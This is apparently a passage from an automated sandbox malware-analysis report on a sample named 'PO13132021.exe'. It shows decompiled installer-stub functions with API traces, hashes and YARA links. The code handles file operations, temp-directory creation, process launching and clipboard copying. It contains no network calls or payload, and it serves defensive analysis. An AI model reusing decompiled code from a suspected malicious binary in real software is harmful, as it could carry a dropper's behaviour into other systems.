Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
String ID:
API String ID: 2547128583-0
Opcode ID: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction ID: e63780c8bf1f0faf28ba6c6d4be53ddd5ff0707a9bdd482d1e4d5d99537df4e3
Opcode Fuzzy Hash: 2284c13bb0467c230d08af9fe6f3031970f5259716d95ff003564f382569e38e
Instruction Fuzzy Hash: 94E086326042106AD6106B70AE04C7773A89F84750702483EF546F2150D7399C3596AD

Uniqueness

Uniqueness Score: -1.00%

Function 00405DC1, Relevance: 3.0, APIs: 2, Instructions: 16
fileCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E00405DC1(CHAR* _a4, long _a8, long _a12) {
				signed int _t5;
				void* _t6;

				_t5 = GetFileAttributesA(_a4); // executed
				asm("sbb ecx, ecx");
				_t6 = CreateFileA(_a4, _a8, 1, 0, _a12,  ~(_t5 + 1) & _t5, 0); // executed
				return _t6;
			}

0x00405dc5
0x00405dd2
0x00405de7
0x00405ded

APIs

GetFileAttributesA.KERNELBASE(00000003,00402F34,C:\Users\user\Desktop\PO13132021.exe,80000000,00000003), ref: 00405DC5
CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405DE7

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: File$AttributesCreate
String ID:
API String ID: 415043291-0
Opcode ID: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction ID: c1cd633b288b309c16b37b55694bd397a2d2f3fd27c3ea135bedd35eac3c4d3c
Opcode Fuzzy Hash: f7726857ad0760fd27b8592a290aaff25a5a689f9fd17e1a71efc27c39f42f7d
Instruction Fuzzy Hash: D9D09E31254602AFEF0D8F20DE16F2E7AA2EB84B00F11952CB682944E2DA715819AB19

Uniqueness

Uniqueness Score: -1.00%

Function 00405D9C, Relevance: 3.0, APIs: 2, Instructions: 13
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405D9C(CHAR* _a4) {
				signed char _t3;
				signed char _t7;

				_t3 = GetFileAttributesA(_a4); // executed
				_t7 = _t3;
				if(_t7 != 0xffffffff) {
					SetFileAttributesA(_a4, _t3 & 0x000000fe);
				}
				return _t7;
			}

0x00405da1
0x00405da7
0x00405dac
0x00405db5
0x00405db5
0x00405dbe

APIs

GetFileAttributesA.KERNELBASE(?,?,004059B4,?,?,00000000,00405B97,?,?,?,?), ref: 00405DA1
SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DB5

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction ID: 45e1b313f31d266de6e0d804bcdac0c4d644dd7a0ef1fc7463663643c81ebfd1
Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
Instruction Fuzzy Hash: F9D0A932000021ABD2002728EE0C88BBB91DB00270702CA36FCA4A22B2DB300C129A98

Uniqueness

Uniqueness Score: -1.00%

Function 00405892, Relevance: 3.0, APIs: 2, Instructions: 9
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405892(CHAR* _a4) {
				int _t2;

				_t2 = CreateDirectoryA(_a4, 0); // executed
				if(_t2 == 0) {
					return GetLastError();
				}
				return 0;
			}

0x00405898
0x004058a0
0x00000000
0x004058a6
0x00000000

APIs

CreateDirectoryA.KERNELBASE(?,00000000,00403454,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403673,?,00000007,00000009,0000000B), ref: 00405898
GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058A6

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: CreateDirectoryErrorLast
String ID:
API String ID: 1375471231-0
Opcode ID: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction ID: ae32aa403121d558109e23f4dadc85ee7ba81b7b8263ff8d49f56a55f4155d83
Opcode Fuzzy Hash: 1ac3f182099991a074ef026cd112de1bb624e535cee62a6747cbed0a6cbac083
Instruction Fuzzy Hash: D5C04C316045019BE6506B319F08B1B7A549F50741F158439A78AE41E4DA388465D92D

Uniqueness

Uniqueness Score: -1.00%

Function 00405E68, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E68(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e6c
0x00405e7c
0x00405e84
0x00000000
0x00405e8b
0x00000000
0x00405e8d

APIs

WriteFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,0040C25B,0040B8F8,0040339A,0040B8F8,0040C25B,004138F8,00004000,?,00000000,004031C4,00000004), ref: 00405E7C

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileWrite
String ID:
API String ID: 3934441357-0
Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction ID: 83138c6b6f61fe56512c00d99342466dd547819508ce818909ec7b1084a3bb5f
Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
Instruction Fuzzy Hash: 48E0463221021AABDF109F60CC04AAB3B6CEB00260F404432FAA4E2140E234E9208AE4

Uniqueness

Uniqueness Score: -1.00%

Function 00405E39, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00405E39(void* _a4, void* _a8, long _a12) {
				int _t7;
				long _t11;

				_t11 = _a12;
				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
				if(_t7 == 0 || _t11 != _a12) {
					return 0;
				} else {
					return 1;
				}
			}

0x00405e3d
0x00405e4d
0x00405e55
0x00000000
0x00405e5c
0x00000000
0x00405e5e

APIs

ReadFile.KERNELBASE(0040A130,00000000,00000000,00000000,00000000,004138F8,0040B8F8,00403416,0040A130,0040A130,0040331A,004138F8,00004000,?,00000000,004031C4), ref: 00405E4D

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction ID: cce2834e44819e2e6951819013f8ba23c93adc22c6858a83ce884f24d90f4801
Opcode Fuzzy Hash: 416aeb435aa013431afb1a9c1c8b913c8d53da26c76a00aa22b400e2b7bce1d1
Instruction Fuzzy Hash: BFE0463220061AABCF119F60CC00AEB3B6CEB046E0F044832B955E2040D230EA209BE8

Uniqueness

Uniqueness Score: -1.00%

Function 00403419, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00403419(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
				return _t2;
			}

0x00403427
0x0040342d

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00403117,?), ref: 00403427

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D

Uniqueness

Uniqueness Score: -1.00%

Function 00401F7B, Relevance: 1.3, APIs: 1, Instructions: 37
COMMON

Download Yara Rule

C-Code - Quality: 78%

			E00401F7B(void* __ecx) {
				void* _t8;
				void* _t12;
				void* _t14;
				void* _t16;
				void* _t17;
				void* _t20;
				void* _t22;

				_t16 = __ecx;
				_t19 = E00402BCE(_t14);
				E0040534F(0xffffffeb, _t6);
				_t8 = E004058C7(_t19); // executed
				_t20 = _t8;
				if(_t20 == _t14) {
					 *((intOrPtr*)(_t22 - 4)) = 1;
				} else {
					if( *((intOrPtr*)(_t22 - 0x20)) != _t14) {
						_t12 = E004066A6(_t16, _t20); // executed
						if( *((intOrPtr*)(_t22 - 0x24)) < _t14) {
							if(_t12 != _t14) {
								 *((intOrPtr*)(_t22 - 4)) = 1;
							}
						} else {
							E00406186(_t17, _t12);
						}
					}
					_push(_t20);
					CloseHandle();
				}
				 *0x4247e8 =  *0x4247e8 +  *((intOrPtr*)(_t22 - 4));
				return 0;
			}

0x00401f7b
0x00401f81
0x00401f86
0x00401f8c
0x00401f91
0x00401f95
0x004027bf
0x00401f9b
0x00401f9e
0x00401fa1
0x00401fa9
0x00401fb6
0x00401fb8
0x00401fb8
0x00401fab
0x00401fad
0x00401fad
0x00401fa9
0x00401fbf
0x00401fc0
0x00401fc0
0x00402a5d
0x00402a69

APIs

Part of subcall function 0040534F: lstrlenA.KERNEL32(00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000,?), ref: 00405388
Part of subcall function 0040534F: lstrlenA.KERNEL32(00402EC9,00420530,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402EC9,00000000), ref: 00405398
Part of subcall function 0040534F: lstrcatA.KERNEL32(00420530,00402EC9,00402EC9,00420530,00000000,00000000,00000000), ref: 004053AB
Part of subcall function 0040534F: SetWindowTextA.USER32(00420530,00420530), ref: 004053BD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004053E3
Part of subcall function 0040534F: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004053FD
Part of subcall function 0040534F: SendMessageA.USER32(?,00001013,?,00000000), ref: 0040540B

Part of subcall function 004058C7: CreateProcessA.KERNELBASE(00000000,?,00000000,00000000,00000000,04000000,00000000,00000000,00422558,Error launching installer), ref: 004058F0
Part of subcall function 004058C7: CloseHandle.KERNEL32(?), ref: 004058FD

CloseHandle.KERNEL32(?,?,?,?,?,?), ref: 00401FC0

Part of subcall function 004066A6: WaitForSingleObject.KERNEL32(?,00000064), ref: 004066B7
Part of subcall function 004066A6: GetExitCodeProcess.KERNELBASE ref: 004066D9

Part of subcall function 00406186: wsprintfA.USER32 ref: 00406193

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$CloseHandleProcesslstrlen$CodeCreateExitObjectSingleTextWaitWindowlstrcatwsprintf
String ID:
API String ID: 2972824698-0
Opcode ID: cdc221f89d23c6c352f85f415f0525d99305980568e953e987afbaa242dd52f5
Instruction ID: c39b2fab311c6406d0a75a142b00e3de853cd320024f06f566d71e8db0f4d4b7
Opcode Fuzzy Hash: cdc221f89d23c6c352f85f415f0525d99305980568e953e987afbaa242dd52f5
Instruction Fuzzy Hash: 00F09632605121DBCB20BBA14E8499EB2A4DF01318B25463FF502B21D1C77C4D428A6E

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0040548D, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 282
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 96%

			E0040548D(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				struct tagRECT _v24;
				void* _v32;
				signed int _v36;
				int _v40;
				int _v44;
				signed int _v48;
				int _v52;
				void* _v56;
				void* _v64;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t87;
				struct HWND__* _t89;
				long _t90;
				int _t95;
				int _t96;
				long _t99;
				void* _t102;
				intOrPtr _t124;
				struct HWND__* _t128;
				int _t150;
				int _t153;
				long _t157;
				struct HWND__* _t161;
				struct HMENU__* _t163;
				long _t165;
				void* _t166;
				char* _t167;
				char* _t168;
				int _t169;

				_t87 =  *0x423f24; // 0x0
				_t157 = _a8;
				_t150 = 0;
				_v8 = _t87;
				if(_t157 != 0x110) {
					__eflags = _t157 - 0x405;
					if(_t157 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00405421, GetDlgItem(_a4, 0x3ec), 0,  &_a8));
					}
					__eflags = _t157 - 0x111;
					if(_t157 != 0x111) {
						L17:
						__eflags = _t157 - 0x404;
						if(_t157 != 0x404) {
							L25:
							__eflags = _t157 - 0x7b;
							if(_t157 != 0x7b) {
								goto L20;
							}
							_t89 = _v8;
							__eflags = _a12 - _t89;
							if(_a12 != _t89) {
								goto L20;
							}
							_t90 = SendMessageA(_t89, 0x1004, _t150, _t150);
							__eflags = _t90 - _t150;
							_a12 = _t90;
							if(_t90 <= _t150) {
								L36:
								return 0;
							}
							_t163 = CreatePopupMenu();
							AppendMenuA(_t163, _t150, 1, E004062BB(_t150, _t157, _t163, _t150, 0xffffffe1));
							_t95 = _a16;
							__eflags = _a16 - 0xffffffff;
							_t153 = _a16 >> 0x10;
							if(_a16 == 0xffffffff) {
								GetWindowRect(_v8,  &_v24);
								_t95 = _v24.left;
								_t153 = _v24.top;
							}
							_t96 = TrackPopupMenu(_t163, 0x180, _t95, _t153, _t150, _a4, _t150);
							__eflags = _t96 - 1;
							if(_t96 == 1) {
								_t165 = 1;
								__eflags = 1;
								_v56 = _t150;
								_v44 = 0x420d50;
								_v40 = 0x1000;
								_a4 = _a12;
								do {
									_a4 = _a4 - 1;
									_t99 = SendMessageA(_v8, 0x102d, _a4,  &_v64);
									__eflags = _a4 - _t150;
									_t165 = _t165 + _t99 + 2;
								} while (_a4 != _t150);
								OpenClipboard(_t150);
								EmptyClipboard();
								_t102 = GlobalAlloc(0x42, _t165);
								_a4 = _t102;
								_t166 = GlobalLock(_t102);
								do {
									_v44 = _t166;
									_t167 = _t166 + SendMessageA(_v8, 0x102d, _t150,  &_v64);
									 *_t167 = 0xd;
									_t168 = _t167 + 1;
									 *_t168 = 0xa;
									_t166 = _t168 + 1;
									_t150 = _t150 + 1;
									__eflags = _t150 - _a12;
								} while (_t150 < _a12);
								GlobalUnlock(_a4);
								SetClipboardData(1, _a4);
								CloseClipboard();
							}
							goto L36;
						}
						__eflags =  *0x423f0c - _t150; // 0x0
						if(__eflags == 0) {
							ShowWindow( *0x424748, 8);
							__eflags =  *0x4247ec - _t150;
							if( *0x4247ec == _t150) {
								E0040534F( *((intOrPtr*)( *0x420528 + 0x34)), _t150);
							}
							E00404285(1);
							goto L25;
						}
						 *0x420120 = 2;
						E00404285(0x78);
						goto L20;
					} else {
						__eflags = _a12 - 0x403;
						if(_a12 != 0x403) {
							L20:
							return E00404313(_t157, _a12, _a16);
						}
						ShowWindow( *0x423f10, _t150);
						ShowWindow(_v8, 8);
						E004042E1(_v8);
						goto L17;
					}
				}
				_v48 = _v48 | 0xffffffff;
				_v36 = _v36 | 0xffffffff;
				_t169 = 2;
				_v56 = _t169;
				_v52 = 0;
				_v44 = 0;
				_v40 = 0;
				asm("stosd");
				asm("stosd");
				_t124 =  *0x424754;
				_a12 =  *((intOrPtr*)(_t124 + 0x5c));
				_a8 =  *((intOrPtr*)(_t124 + 0x60));
				 *0x423f10 = GetDlgItem(_a4, 0x403);
				 *0x423f08 = GetDlgItem(_a4, 0x3ee);
				_t128 = GetDlgItem(_a4, 0x3f8);
				 *0x423f24 = _t128;
				_v8 = _t128;
				E004042E1( *0x423f10);
				 *0x423f14 = E00404BD2(4);
				 *0x423f2c = 0;
				GetClientRect(_v8,  &_v24);
				_v48 = _v24.right - GetSystemMetrics(_t169);
				SendMessageA(_v8, 0x101b, 0,  &_v56);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a12 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a12);
					SendMessageA(_v8, 0x1026, 0, _a12);
				}
				if(_a8 >= _t150) {
					SendMessageA(_v8, 0x1024, _t150, _a8);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E004042AC(_a4);
				if(( *0x42475c & 0x00000003) != 0) {
					ShowWindow( *0x423f10, _t150);
					if(( *0x42475c & 0x00000002) != 0) {
						 *0x423f10 = _t150;
					} else {
						ShowWindow(_v8, 8);
					}
					E004042E1( *0x423f08);
				}
				_t161 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t161, 0x401, _t150, 0x75300000);
				if(( *0x42475c & 0x00000004) != 0) {
					SendMessageA(_t161, 0x409, _t150, _a8);
					SendMessageA(_t161, 0x2001, _t150, _a12);
				}
				goto L36;
			}

0x00405493
0x0040549b
0x0040549e
0x004054a6
0x004054a9
0x00405638
0x0040563e
0x00405662
0x00405662
0x0040566e
0x00405674
0x00405696
0x00405696
0x0040569c
0x004056f1
0x004056f1
0x004056f4
0x00000000
0x00000000
0x004056f6
0x004056f9
0x004056fc
0x00000000
0x00000000
0x00405706
0x0040570c
0x0040570e
0x00405711
0x0040580e
0x00000000
0x0040580e
0x00405720
0x0040572c
0x00405735
0x0040573c
0x00405740
0x00405743
0x0040574c
0x00405752
0x00405755
0x00405755
0x00405765
0x0040576b
0x0040576e
0x00405779
0x00405779
0x0040577a
0x0040577d
0x00405784
0x0040578b
0x00405793
0x00405793
0x004057a1
0x004057a7
0x004057aa
0x004057aa
0x004057b1
0x004057b7
0x004057c0
0x004057c7
0x004057d0
0x004057d2
0x004057d5
0x004057e4
0x004057e6
0x004057e9
0x004057ea
0x004057ed
0x004057ee
0x004057ef
0x004057ef
0x004057f7
0x00405802
0x00405808
0x00405808
0x00000000
0x0040576e
0x0040569e
0x004056a4
0x004056d2
0x004056d4
0x004056da
0x004056e5
0x004056e5
0x004056ec
0x00000000
0x004056ec
0x004056a8
0x004056b2
0x00000000
0x00405676
0x00405676
0x0040567c
0x004056b7
0x00000000
0x004056be
0x00405685
0x0040568c
0x00405691
0x00000000
0x00405691
0x00405674
0x004054af
0x004054b3
0x004054bb
0x004054bf
0x004054c2
0x004054c5
0x004054c8
0x004054cb
0x004054cc
0x004054cd
0x004054e6
0x004054e9
0x004054f3
0x00405502
0x0040550a
0x00405512
0x00405517
0x0040551a
0x00405526
0x0040552f
0x00405538
0x0040555a
0x00405560
0x00405571
0x00405576
0x00405584
0x00405592
0x00405592
0x00405597
0x004055a5
0x004055a5
0x004055aa
0x004055ad
0x004055b2
0x004055be
0x004055c7
0x004055d4
0x004055e3
0x004055d6
0x004055db
0x004055db
0x004055ef
0x004055ef
0x00405603
0x0040560c
0x00405615
0x00405625
0x00405631
0x00405631
0x00000000

APIs

GetDlgItem.USER32 ref: 004054EC
GetDlgItem.USER32 ref: 004054FB
GetClientRect.USER32 ref: 00405538
GetSystemMetrics.USER32 ref: 0040553F
SendMessageA.USER32(?,0000101B,00000000,?), ref: 00405560
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405571
SendMessageA.USER32(?,00001001,00000000,?), ref: 00405584
SendMessageA.USER32(?,00001026,00000000,?), ref: 00405592
SendMessageA.USER32(?,00001024,00000000,?), ref: 004055A5
ShowWindow.USER32(00000000,?,0000001B,?), ref: 004055C7
ShowWindow.USER32(?,00000008), ref: 004055DB
GetDlgItem.USER32 ref: 004055FC
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 0040560C
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 00405625
SendMessageA.USER32(00000000,00002001,00000000,?), ref: 00405631
GetDlgItem.USER32 ref: 0040550A

Part of subcall function 004042E1: SendMessageA.USER32(00000028,?,00000001,00404111), ref: 004042EF

GetDlgItem.USER32 ref: 0040564D
CreateThread.KERNEL32 ref: 0040565B
CloseHandle.KERNEL32(00000000), ref: 00405662
ShowWindow.USER32(00000000), ref: 00405685
ShowWindow.USER32(?,00000008), ref: 0040568C
ShowWindow.USER32(00000008), ref: 004056D2
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405706
CreatePopupMenu.USER32 ref: 00405717
AppendMenuA.USER32 ref: 0040572C
GetWindowRect.USER32 ref: 0040574C
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405765
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057A1
OpenClipboard.USER32(00000000), ref: 004057B1
EmptyClipboard.USER32 ref: 004057B7
GlobalAlloc.KERNEL32(00000042,?), ref: 004057C0
GlobalLock.KERNEL32 ref: 004057CA
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004057DE
GlobalUnlock.KERNEL32(00000000), ref: 004057F7
SetClipboardData.USER32 ref: 00405802
CloseClipboard.USER32 ref: 00405808

Strings

PB, xrefs: 0040577D

Memory Dump Source

Source File: 00000000.00000002.215331013.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.215317063.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215358332.0000000000408000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.215380334.000000000040A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215435164.0000000000423000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215456992.000000000042A000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.215487419.000000000042D000.00000002.00020000.sdmp Download File

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: PB
API String ID: 590372296-3196168531
Opcode ID: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
Instruction ID: 9c2a32fab53b6b0d4bb0e075a5e6b47c54eb8059f7c6cc06f8c9c6988e8d3156
Opcode Fuzzy Hash: bc35d437d32a5d9e0c2e08b7534ebc779b05656c8fefaf435ff26a8f2e4e9d86
Instruction Fuzzy Hash: 42A16C71A00608BFDB119FA0DE85AAE7BB9FB48354F40403AFA44B61A0CB794E51DF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040473E, Relevance: 24.8, APIs: 10, Strings: 4, Instructions: 274
stringCOMMON

Download Yara Rule

C-Code - Quality: 78%

			E0040473E(unsigned int __edx, struct HWND__* _a4, intOrPtr _a8, unsigned int _a12, intOrPtr _a16) {
				signed int _v8;
				signed int _v12;
				long _v16;
				long _v20;
				long _v24;
				char _v28;
				intOrPtr _v32;
				long _v36;
				char _v40;
				unsigned int _v44;
				signed int _v48;
				CHAR* _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				CHAR* _v72;
				void _v76;
				struct HWND__* _v80;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t82;
				long _t87;
				signed char* _t89;
				void* _t95;
				signed int _t96;
				int _t109;
				signed char _t114;
				signed int _t118;
				struct HWND__** _t122;
				intOrPtr* _t138;
				CHAR* _t146;
				intOrPtr _t147;
				unsigned int _t150;
				signed int _t152;
				unsigned int _t156;
				signed int _t158;
				signed int* _t159;
				signed char* _t160;
				struct HWND__* _t165;
				struct HWND__* _t166;
				int _t168;
				unsigned int _t197;

				_t156 = __edx;
				_t82 =  *0x420528;
				_v32 = _t82;
				_t146 = ( *(_t82 + 0x3c) << 0xa) + 0x425000;
				_v12 =  *((intOrPtr*)(_t82 + 0x38));
				if(_a8 == 0x40b) {
					E00405928(0x3fb, _t146);
					E00406503(_t146);
				}
				_t166 = _a4;
				if(_a8 != 0x110) {
					L8:
					if(_a8 != 0x111) {
						L20:
						if(_a8 == 0x40f) {
							L22:
							_v8 = _v8 & 0x00000000;
							_v12 = _v12 & 0x00000000;
							E00405928(0x3fb, _t146);
							if(E00405CAE(_t185, _t146) == 0) {
								_v8 = 1;
							}
							E00406228(0x41fd20, _t146);
							_t87 = E00406631(1);
							_v16 = _t87;
							if(_t87 == 0) {
								L30:
								E00406228(0x41fd20, _t146);
								_t89 = E00405C59(0x41fd20);
								_t158 = 0;
								if(_t89 != 0) {
									 *_t89 =  *_t89 & 0x00000000;
								}
								if(GetDiskFreeSpaceA(0x41fd20,  &_v20,  &_v24,  &_v16,  &_v36) == 0) {
									goto L35;
								} else {
									_t168 = 0x400;
									_t109 = MulDiv(_v20 * _v24, _v16, 0x400);
									asm("cdq");
									_v48 = _t109;
									_v44 = _t156;
									_v12 = 1;
									goto L36;
								}
							} else {
								_t159 = 0;
								if(0 == 0x41fd20) {
									goto L30;
								} else {
									goto L26;
								}
								while(1) {
									L26:
									_t114 = _v16(0x41fd20,  &_v48,  &_v28,  &_v40);
									if(_t114 != 0) {
										break;
									}
									if(_t159 != 0) {
										 *_t159 =  *_t159 & _t114;
									}
									_t160 = E00405C07(0x41fd20);
									 *_t160 =  *_t160 & 0x00000000;
									_t159 = _t160 - 1;
									 *_t159 = 0x5c;
									if(_t159 != 0x41fd20) {
										continue;
									} else {
										goto L30;
									}
								}
								_t150 = _v44;
								_v48 = (_t150 << 0x00000020 | _v48) >> 0xa;
								_v44 = _t150 >> 0xa;
								_v12 = 1;
								_t158 = 0;
								__eflags = 0;
								L35:
								_t168 = 0x400;
								L36:
								_t95 = E00404BD2(5);
								if(_v12 != _t158) {
									_t197 = _v44;
									if(_t197 <= 0 && (_t197 < 0 || _v48 < _t95)) {
										_v8 = 2;
									}
								}
								_t147 =  *0x423f1c; // 0x74a557
								if( *((intOrPtr*)(_t147 + 0x10)) != _t158) {
									E00404BBA(0x3ff, 0xfffffffb, _t95);
									if(_v12 == _t158) {
										SetDlgItemTextA(_a4, _t168, 0x41fd10);
									} else {
										E00404AF5(_t168, 0xfffffffc, _v48, _v44);
